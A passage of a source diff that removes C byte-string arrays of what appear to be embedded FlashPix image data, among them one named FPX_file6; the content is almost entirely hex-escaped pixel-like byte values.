-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfa\xf8" -"\xf6\xf4\xf3\xf0\xeb\xe8\xe5\xe5\xe6\xeb\xe5\xe8\xf0\xe4\xe6\xec" -"\xe2\xe6\xed\xd9\xd6\xd1\xd1\xc5\xb0\xce\xc0\xa7\xcd\xbc\xa0\xd3" 
-"\xcb\xbc\xdd\xdc\xdc\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe7\xed\xe6\xe7" -"\xeb\xe9\xe8\xe9\xf3\xf1\xf0\xf8\xf7\xf5\xf8\xf4\xee\xd8\xc5\xaa" -"\xd9\xc7\xad\xd9\xc4\xa8\xdd\xe4\xf6\xd4\xdf\xf8\xd7\xe2\xf9\xd4" -"\xe0\xf9\xd8\xe3\xf9\xd8\xe3\xf9\xee\xf3\xfc\xfe\xfe\xfe\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe" -"\xfe\xfe\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xfe\xfd\xfd\xfc\xfb\xf9\xeb\xea\xe9\xe6\xe9\xf0\xe6\xe9\xf1" -"\xae\xc7\xd6\x87\xb8\xd3\x81\xb7\xd3\x81\xb5\xd1\x81\xb6\xd1\x82" -"\xb7\xd5\x9f\xbe\xce\xdd\xdf\xe2\xe6\xe9\xf1\xe1\xdf\xde\xef\xee" -"\xed\xee\xee\xf0\xe2\xe9\xf9\xe1\xe9\xfb\xea\xef\xfa\xdc\xdd\xe5" -"\xdf\xdf\xe4\xef\xeb\xe8\xf0\xf4\xfc\xfd\xfe\xfe\xfe\xfe\xfe\xfe" -"\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xfe\xfe\xfe\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfb\xfb\xfb\xfb\xfb" -"\xfc\xfd\xfd\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xfc\xfc\xfc\xfb\xfb\xfb\xfd\xfd\xfd\xfb" -"\xfb\xfb\xfd\xfd\xfd\xfd\xfd\xfd\xfe\xfe\xfe\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfa\xfa\xfa\xfb\xfb\xfb\xe7" -"\xe7\xe7\xdb\xdc\xdc\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xf1\xee\xea\xe5\xe7\xeb\xe6\xe9\xf1" -"\x61\xae\xda\x37\xaa\xef\x35\xaa\xf0\x35\xa9\xee\x35\xa9\xef\x35" -"\xaa\xf0\x52\xa7\xd6\xbd\xc0\xbf\xb6\xd5\xf1\xc6\xd4\xe0\xd8\xe7" -"\xf3\xdd\xe8\xfa\xab\xc1\xf4\xa7\xbe\xf4\xac\xc2\xf5\x99\xb3\xf4" -"\xa9\xc0\xf4\xd9\xe3\xf9\xc5\xd5\xf8\xf9\xfb\xfe\xff\xff\xff\xfd" -"\xfd\xfd\xf9\xfa\xfa\xfc\xfc\xfc\xfb\xfb\xfb\xfe\xfe\xfe\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xe6\xe6\xe6\xe7\xe7\xe7\xf7\xf7\xf7\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xfc\xfc\xfc\xfb\xfb\xfb\xfb\xfb\xfc" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf1\xf1\xf2\xf2\xf2" -"\xf2\xfa\xfa\xfa\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xca\xca\xca\xd2\xd2\xd3\xc7\xc8\xc9\xb3" -"\xb4\xb3\xb6\xb7\xb7\xc0\xc1\xc1\xe3\xe3\xe3\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xdd\xdd\xdd\xc3\xc3\xc3\xb4\xb5\xb5\xbf" -"\xc0\xc1\xb8\xb9\xba\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xf0\xee\xeb\xe5\xe7\xeb\xe6\xe9\xf1" -"\x51\xad\xe2\x32\xad\xf7\x32\xad\xf7\x30\x7f\xad\x2f\x8d\xc3\x32" -"\xaa\xf2\x43\xa9\xe5\xb5\xc2\xc9\xe6\xe9\xf1\xdf\xdd\xdb\xf6\xf7" -"\xf7\xfc\xfd\xfe\xf7\xf9\xfe\xf8\xf9\xfd\xf8\xfa\xfd\xf8\xfa\xfe" -"\xf8\xfa\xfe\xf4\xf7\xfd\xf1\xf5\xfc\xfd\xfd\xfe\xff\xff\xff\xcf" -"\xd0\xd0\xbf\xc0\xc0\xa5\xa7\xa8\xb6\xb7\xb7\xec\xec\xec\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xc6\xc6\xc7\xa8\xa9\xa8\xbf\xbf\xc0\xfd\xfd\xfd\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xf5\xf5\xf5\xf1\xf1\xf2\xf2\xf2\xf2" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xe2\xe2\xe2\xd6\xd7\xd7\xdc\xdc\xdd\xd4" -"\xd5\xd5\xcd\xce\xce\xcb\xcc\xcc\xf1\xf1\xf1\xff\xff\xff\xff\xff" -; - -unsigned char FPX_file6[] = -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xef\xef\xf0\xd5\xd5\xd6\xd1\xd1\xd2\xd4" -"\xd4\xd5\xcd\xce\xce\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xf2\xf0\xef\xe6\xe8\xed\xe6\xe9\xf1" -"\x51\xad\xe2\x32\xad\xf7\x32\xad\xf7\x31\x7d\xab\x30\x91\xcb\x32" -"\xa8\xef\x43\xa9\xe5\xb5\xc7\xd2\xe6\xe9\xf1\xdf\xdd\xdb\xf6\xf7" -"\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xfe\xfe\xfe\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xe5" -"\xe5\xe5\xc9\xca\xcb\xbd\xbe\xbf\xd3\xd4\xd5\xf5\xf5\xf6\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xd6\xd6\xd7\xc7\xc7\xc7\xd1\xd1\xd1\xfe\xfe\xfe\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xfd\xfd\xfd\xfc\xfc\xfc\xfd\xfd\xfd\xf4" -"\xec\xe2\xf9\xf7\xf5\xfb\xfb\xfb\xfe\xfe\xfe\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfb\xfb\xfb\xfb\xfb\xfb\xfb" -"\xfb\xfa\xfa\xfb\xfb\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xf1\xee\xec\xe5\xe7\xec\xe6\xe9\xf1" -"\x5b\xad\xdc\x33\xab\xf3\x32\xab\xf4\x32\x9b\xdb\x32\xa7\xed\x32" -"\xab\xf3\x4a\xa9\xe0\xba\xc4\xc8\xe6\xe9\xf1\xdf\xdd\xda\xf6\xf7" -"\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc" -"\xfb\xfa\xf1\xee\xe9\xee\xec\xeb\xfc\xfc\xfc\xfe\xfe\xfe\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xeb\xe7\xe1\xf4\xf2\xf0\xfb\xfb\xfb\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xfe\xfd\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xf8\xf2\xea\xf0\xe3\xd2\xf3\xec\xe1" -"\xfe\xfd\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc" -"\xfa\xf7\xec\xdb\xc4\xd7\xb4\x84\xf6\xf0\xe8\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xf7\xf2\xd7" -"\xb3\x83\xe7\xd2\xb5\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xf2\xef\xea\xe5\xe8\xef\xe6\xe9\xf1" -"\xe5\xe8\xef\xe4\xe7\xed\xe4\xe5\xea\xe4\xe7\xec\xe4\xe5\xe9\xe4" -"\xe6\xec\xe5\xe7\xee\xe6\xe9\xf1\xe6\xe9\xf1\xd6\xcd\xbe\xfd\xfd" -"\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfd\xfc\xfa\xdd" -"\xbe\x94\xf9\xf4\xee\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf7\xf1\xe9\xd8\xb4\x82" -"\xd4\xaf\x7c\xfb\xf8\xf4\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf7\xf1\xea\xfa\xf7" 
-"\xf3\xf6\xee\xe3\xfc\xf9\xf6\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf8\xf3\xed" -"\xe2\xcb\xac\xfd\xfc\xfb\xfb\xf8\xf5\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xd4\xab\x75\xda\xb8\x88\xed\xde" -"\xc9\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe" -"\xfe\xfe\xd7\xb2\x7f\xfd\xfd\xfc\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xf2\xef\xeb\xec\xed\xf1\xe7\xe5\xe3" -"\xe6\xe4\xe1\xed\xee\xf3\xe7\xe5\xe2\xe4\xdd\xd6\xe9\xe9\xe9\xeb" -"\xec\xee\xed\xee\xf1\xe4\xe0\xda\xee\xf0\xf5\xfa\xfb\xfd\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xef\xe1\xcd\xce\x9f\x5f\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x6e" -"\xff\xff\xff\xff\xfc\xfa\xf7\xed\xdd\xc8\xd2\xa9\x72\xf3\xea\xdc" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xed\xdf\xcb\xfa\xf7\xf2\xf7\xf2\xea\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe" -"\xfd\xfd\xfc\xfd\xfc\xfb\xf3\xe9\xdc\xfa\xf7\xf3\xf6\xf0\xe8\xfe" -"\xfd\xfc\xff\xff\xff\xff\xff\xff\xfa\xf7\xf2\xf0\xe4\xd3\xe5\xce" -"\xaf\xe7\xd2\xb5\xf2\xe8\xd9\xfb\xf9\xf5\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe" -"\xfe\xfe\xf8\xf2\xea\xe4\xcc\xab\xf6\xef\xe5\xfe\xfe\xfd\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xfc\xfb\xfa\xfc\xfb\xfa\xfb\xfa\xf9" -"\xfb\xfa\xf9\xfc\xfb\xfa\xfb\xfa\xf9\xe6\xd2\xb6\xfa\xf8\xf5\xfc" 
-"\xfb\xfa\xfc\xfb\xfa\xfe\xfe\xfe\xff\xff\xff\xfe\xfe\xfd\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xfd\xfc\xfb\xe4\xcc\xab\xe3\xca\xa8\xf3\xe8\xda\xfe" -"\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfb\xf8" -"\xf3\xe7\xd1\xb4\xe1\xc7\xa3\xe6\xd0\xb1\xfa\xf7\xf2\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xfe\xfe\xfd\xfc\xfa\xf8\xf7\xf1\xe9\xf0" -"\xe5\xd6\xf9\xf4\xee\xf7\xf1\xe9\xfd\xfb\xf9\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfd\xfc" -"\xfa\xf8\xf4\xeb\xdf\xf2\xe9\xdb\xf7\xf1\xe9\xf9\xf6\xf0\xfe\xfd" -"\xfd\xfd\xfc\xfb\xf7\xf1\xe8\xec\xdb\xc4\xe2\xc9\xa6\xf1\xe6\xd6" -"\xfe\xfe\xfe\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xfb\xf9\xf5\xeb\xda\xc2\xe0\xc5\xa0\xfd\xfc" -"\xfa\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xcf\xb1\xfd\xfb\xf9\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf4\xea\xdd" -"\xe4\xcc\xab\xe3\xcb\xa9\xfd\xfc\xfa\xfe\xfe\xfe\xff\xff\xff\xfe" -"\xfe\xfe\xfc\xfb\xf8\xf5\xed\xe1\xe2\xc8\xa4\xe3\xcb\xa9\xed\xde" -"\xc9\xfd\xfc\xfb\xfe\xfe\xfe\xfe\xfe\xfe\xfb\xf9\xf6\xfe\xfe\xfe" -"\xf7\xf1\xe9\xf9\xf4\xed\xfa\xf6\xf0\xf8\xf3\xec\xfe\xfe\xfe\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xfe\xfd\xfd\xfd\xfb\xfa\xf3\xeb\xde\xf3\xea\xdd\xfa\xf7" -"\xf3\xfa\xf7\xf2\xfe\xfe\xfd\xfe\xfd\xfd\xef\xe2\xcf\xdb\xbc\x92" -"\xd3\xab\x74\xf4\xea\xde\xfc\xfa\xf7\xfe\xfe\xfe\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xfd\xfb\xf9\xee\xdf\xcb\xed\xde" -"\xc9\xfc\xfa\xf8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xcf\xb1\xfd\xfb\xf9\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfa\xf6\xf0\xe1\xc6\xa2" -"\xea\xd8\xbf\xf9\xf5\xee\xff\xff\xff\xff\xff\xff\xfe\xfe\xfd\xf1" -"\xe5\xd5\xe6\xd0\xb2\xe1\xc7\xa3\xf1\xe5\xd6\xfb\xf7\xf3\xfe\xfe" -"\xfd\xfe\xfd\xfc\xfb\xf9\xf5\xfc\xfa\xf8\xf0\xe4\xd4\xf8\xf2\xeb" -"\xfc\xfa\xf7\xfd\xfc\xfa\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfd\xfc\xfd\xfb\xf9\xfb\xf9" -"\xf6\xf2\xe9\xdd\xfa\xf7\xf3\xf8\xf2\xeb\xfe\xfe\xfd\xff\xff\xff" -"\xfb\xf7\xf2\xe1\xc7\xa3\xe5\xce\xaf\xf0\xe3\xd2\xfe\xfe\xfd\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfd\xfc\xfb\xe1\xc7" -"\xa3\xeb\xd9\xc1\xfc\xf9\xf6\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xcf\xb1\xfd\xfb\xf9\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xfd\xfc\xfb\xf4\xea\xdd\xe4\xcc\xab\xf2\xe8\xda" -"\xfd\xfc\xfa\xfe\xfe\xfe\xfd\xfc\xfb\xf8\xf2\xeb\xed\xde\xc8\xe2" -"\xc8\xa6\xea\xd7\xbe\xf5\xed\xe2\xfe\xfe\xfe\xfd\xfc\xfb\xfa\xf7" 
-"\xf3\xf7\xf2\xea\xf1\xe5\xd6\xf8\xf4\xee\xf9\xf5\xf0\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfc\xfb\xfb\xf8\xf4\xe9\xd8\xc1" -"\xec\xdd\xc8\xf9\xf4\xee\xfb\xf9\xf5\xf9\xf3\xed\xe4\xcc\xaa\xe1" -"\xc8\xa5\xe9\xd7\xbd\xfc\xfb\xf8\xfe\xfe\xfe\xff\xff\xff\xfe\xfe" -"\xfe\xf8\xf1\xe8\xe4\xcc\xac\xf7\xf0\xe7\xfe\xfe\xfe\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xd0\xb2\xfd\xfb\xf9\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfc" -"\xfb\xf3\xea\xdc\xe3\xcb\xa9\xf2\xe8\xda\xfd\xfc\xfa\xfa\xf6\xf1" -"\xf0\xe3\xd2\xe5\xce\xaf\xe7\xd1\xb5\xf3\xe8\xd9\xfc\xf9\xf6\xf9" -"\xf5\xf0\xfa\xf8\xf4\xf7\xf2\xeb\xf7\xf2\xeb\xfb\xf9\xf6\xfa\xf7" -"\xf3\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xff\xff\xff" -"\xff\xff\xff\xf1\xe7\xd8\xf4\xed\xe2\xfb\xf8\xf5\xf9\xf4\xee\xf2" 
-"\xe6\xd7\xe6\xd1\xb3\xe6\xd0\xb2\xf1\xe6\xd6\xfb\xf8\xf3\xff\xff" -"\xff\xff\xff\xff\xf9\xf5\xef\xe3\xc9\xa6\xf4\xeb\xdf\xfe\xfd\xfd" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xd1\xb3\xfd\xfc\xfa\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xf6\xf0\xeb\xda" -"\xc2\xe1\xc6\xa1\xf9\xf4\xee\xfd\xfc\xfa\xf7\xf1\xe8\xe3\xca\xa8" -"\xe2\xc8\xa5\xea\xd8\xc0\xfb\xf9\xf6\xf9\xf4\xee\xfa\xf7\xf3\xef" -"\xe4\xd3\xf7\xf2\xea\xfb\xf9\xf7\xfe\xfd\xfc\xfe\xfe\xfe\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xfc\xfb\xf8\xfc\xfa\xf7\xf9\xf6\xf1\xf5\xee\xe4\xfb" -"\xf9\xf5\xf7\xf2\xea\xe9\xd6\xbc\xe2\xc8\xa4\xe4\xcc\xaa\xf9\xf4" -"\xed\xfe\xfd\xfc\xfe\xfe\xfe\xea\xd8\xbe\xe1\xc7\xa2\xf2\xe6\xd7" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xd1\xb3\xfd\xfc\xfa\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe3\xcb\xab\xe3\xcb" -"\xa9\xf2\xe7\xd9\xf3\xe9\xdc\xe8\xd4\xb9\xe1\xc7\xa4\xef\xe1\xce" -"\xf7\xf1\xe9\xf8\xf3\xec\xf8\xf3\xed\xef\xe3\xd3\xf6\xf0\xe8\xfb" 